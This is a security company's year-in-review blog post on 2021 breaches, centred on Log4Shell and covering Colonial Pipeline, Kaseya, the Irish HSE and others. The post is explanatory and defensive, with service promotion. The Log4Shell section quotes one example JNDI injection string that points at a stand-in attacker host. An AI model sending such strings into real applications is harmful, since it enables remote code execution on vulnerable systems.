Anatomy of a Breach

Anatomy of a Breach: 2021 Year in Review — Log4Shell, Colonial Pipeline, and the Year Ransomware Became a National Security Crisis

> series: anatomy_of_a_breach —— part: 156 —— year: 2021 —— verdict: ransomware_national_security_crisis —— closing: log4shell_the_vulnerability_in_everything<span class="cursor-blink">_</span>_

Hedgehog Security 31 December 2021 16 min read
data-breach year-in-review 2021 log4shell log4j colonial-pipeline kaseya ransomware series
Breach #156

2021: Colonial Pipeline. Irish HSE. Kaseya. And then Log4Shell broke everything.

On 9 December 2021, a critical remote code execution vulnerability — CVE-2021-44228, dubbed Log4Shell — was disclosed in Apache Log4j, a ubiquitous open-source Java logging library used by hundreds of millions of applications and services worldwide. The vulnerability was trivially exploitable: a specially crafted string sent to any application using Log4j could trigger remote code execution. Within hours of disclosure, mass exploitation was observed globally. The NCSC issued urgent guidance, and cybersecurity teams worldwide scrambled to identify and patch affected systems across their estates.

Log4Shell was the culmination of a year that had already established ransomware as a national security crisis. Colonial Pipeline shut down 45% of America's East Coast fuel through a compromised VPN password. The Irish HSE was devastated by Conti ransomware for four months. JBS paid $11 million to REvil. Kaseya's supply chain attack hit 1,500 businesses. Hafnium compromised 250,000 Exchange servers. And someone tried to poison Florida's water supply through TeamViewer. 2021 was the year cybersecurity became inseparable from national security, public safety, and the functioning of society.

The Breaches
Recommended

Not sure where to start?

We'll scope your test for free and tell you exactly what you need. No obligation, no hard sell.

Free Scoping Call

Twelve months. The most dangerous year yet.

# Breach Key Lesson
145 Mimecast SolarWinds cascade reaches email security. Supply chain attacks propagate.
146 Oldsmar Water Someone tried to poison a city's water via TeamViewer. Shared password. Windows 7.
147 Hafnium / Exchange 250,000 Exchange servers. Four zero-days. Mass exploitation by multiple groups.
148 Facebook 533M Phone numbers and personal data posted free online. €265M DPC fine.
149 Colonial Pipeline 45% of US East Coast fuel. One password. No MFA. $4.4M paid. Executive Order.
150 Irish HSE + JBS Healthcare + food supply. €100M HSE recovery. $11M JBS ransom. Both in May.
151 Kaseya VSA Supply chain ransomware. 1,500 businesses. 800 supermarkets closed. $70M demand.
152 T-Mobile US 40M+ records. Fifth breach. $500M settlement. 'Their security is awful.'
153 Epik 180GB dump including WHOIS privacy data. Privacy service became the vulnerability.
154 Twitch 128GB: entire source code, streamer earnings, internal tools. Server misconfiguration.
155 GoDaddy 1.2M WordPress admin passwords stored in plaintext. SSL keys exposed. Two months.
156 Log4Shell + Year Review CVE-2021-44228. The vulnerability in everything. Trivially exploitable. Universal impact.
Log4Shell

The vulnerability in everything.

Log4Shell was unlike any previous vulnerability in this series. Heartbleed affected OpenSSL. Shellshock affected Bash. EternalBlue affected Windows SMB. Log4Shell affected Log4j — a logging library so ubiquitous that most organisations did not even know which of their systems used it. The vulnerability was present in cloud services (AWS, Azure, GCP), enterprise software (VMware, Cisco, Oracle), game servers (Minecraft), and countless custom applications. The challenge was not patching — it was finding every instance of Log4j in every system, application, and dependency.

Ubiquity: Everywhere, Often Invisible
Log4j was embedded in applications as a transitive dependency — software depended on libraries that depended on Log4j, often without the application developer's knowledge. <a href="/vulnerability-scanning">Vulnerability scanning</a> identifies Log4j instances across your estate. Our <a href="/penetration-testing/web-application">application testing</a> identifies Log4j exposure in web applications.
Trivially Exploitable
Exploitation required only sending a specially crafted string (like ${jndi:ldap://attacker.com/payload}) to any input that was logged by a vulnerable Log4j instance. No authentication required. Exploitable through headers, form fields, user agents, and any logged input. <a href="https://www.socinabox.co.uk">SOC in a Box</a> monitors for Log4Shell exploitation attempts.
Software Supply Chain Visibility
Log4Shell demonstrated the critical importance of knowing what software dependencies your applications contain — a Software Bill of Materials (SBOM). Without visibility into transitive dependencies, organisations cannot know whether they are vulnerable. <a href="/cyber-essentials">Cyber Essentials</a> addresses software inventory and asset management.
Patching a Moving Target
The initial Log4j patch (2.15.0) was followed by additional patches (2.16.0, 2.17.0) as further vulnerabilities were discovered — creating a patching cycle that extended for weeks. <a href="/vulnerability-scanning">Continuous vulnerability scanning</a> ensures that evolving patches are applied as they become available.
Thirteen Years Complete

156 articles. 2009 to 2021. From lost CDs to the vulnerability in everything.

With 156 articles spanning thirteen years, the Anatomy of a Breach series has documented the complete evolution of the cyber threat landscape. The root causes remain unchanged: unpatched systems, weak authentication, misconfigured infrastructure, supply chain trust, and the persistent gap between security policy and implementation. The scale and consequences have grown from inconvenience to existential threat. The controls remain the same. The evidence is overwhelming. Test. Certify. Monitor. Prepare.

Thirteen Years of Evidence

156 breaches. Thirteen years. Log4Shell. Colonial Pipeline. The evidence is overwhelming. Act now.

<a href="/penetration-testing">Test</a>. <a href="/cyber-essentials">Certify</a>. <a href="https://www.socinabox.co.uk">Monitor</a>. <a href="https://www.cyber-defence.io">Prepare</a>. Thirteen years of evidence demands nothing less.

Commission a Penetration Test Back to 2021 — Breach #145
Next Step

Not sure where to start?

We'll scope your test for free and tell you exactly what you need. No obligation, no hard sell.

Free Scoping Call
Keep Reading

Related Articles

Anatomy of a Breach 31 December 2020

Anatomy of a Breach: 2020 Year in Review — SolarWinds, COVID-19, and the Year the Supply Chain Broke

Breach #144 and the 2020 finale. The year COVID-19 transformed the global attack surface overnight, SolarWinds rewrote the supply chain threat model, ransomware claimed its first life at Düsseldorf, Twitter proved social engineering trumps technology, Hackney Council was devastated for two years, Garmin paid $10 million, and the pandemic-fuelled explosion of remote working created new vulnerabilities faster than they could be secured. Then, on 13 December, the SolarWinds/Sunburst supply chain attack was discovered — compromising 18,000 organisations including US government agencies — the most sophisticated supply chain attack in history.

data-breach year-in-review
16 min read
Anatomy of a Breach 31 December 2022

Anatomy of a Breach: 2022 Year in Review — LastPass Vaults Stolen, The Guardian Ransomwared, and Cyber War Came to Europe

Breach #168 and the 2022 finale. The year Russia invaded Ukraine with missiles and malware simultaneously, Lapsus$ teenagers hacked Nvidia, Samsung, Microsoft, and Okta through social engineering, $620 million was stolen from a blockchain through a LinkedIn message, Costa Rica declared a national emergency over Conti ransomware, Medibank's patients had their most intimate health data published as punishment, the NHS was disrupted through its MSP — and in December, LastPass confirmed that attackers had stolen encrypted customer vault backups (meaning millions of users' passwords were in the attackers' hands, protected only by master password strength), while The Guardian newspaper was hit by ransomware. Fourteen years of this series. The threats have never been more diverse, more dangerous, or more personal.

year-in-review 2022
16 min read
Anatomy of a Breach 31 October 2022

Anatomy of a Breach: Medibank — 9.7 Million Australians' Health Data Published After Ransom Refused

Breach #166. In October 2022, Australian health insurer Medibank disclosed that attackers had stolen the personal and health data of 9.7 million current and former customers — approximately 40% of Australia's population. When Medibank refused to pay the ransom, the attackers — linked to the Russian REvil group — published sensitive health claims data on the dark web, including records related to mental health treatment, drug and alcohol rehabilitation, pregnancy terminations, and HIV status. The publication of intimate health data as punishment for non-payment represented the darkest evolution of the double-extortion ransomware model.

data-breach medibank
14 min read
All Posts Get in Touch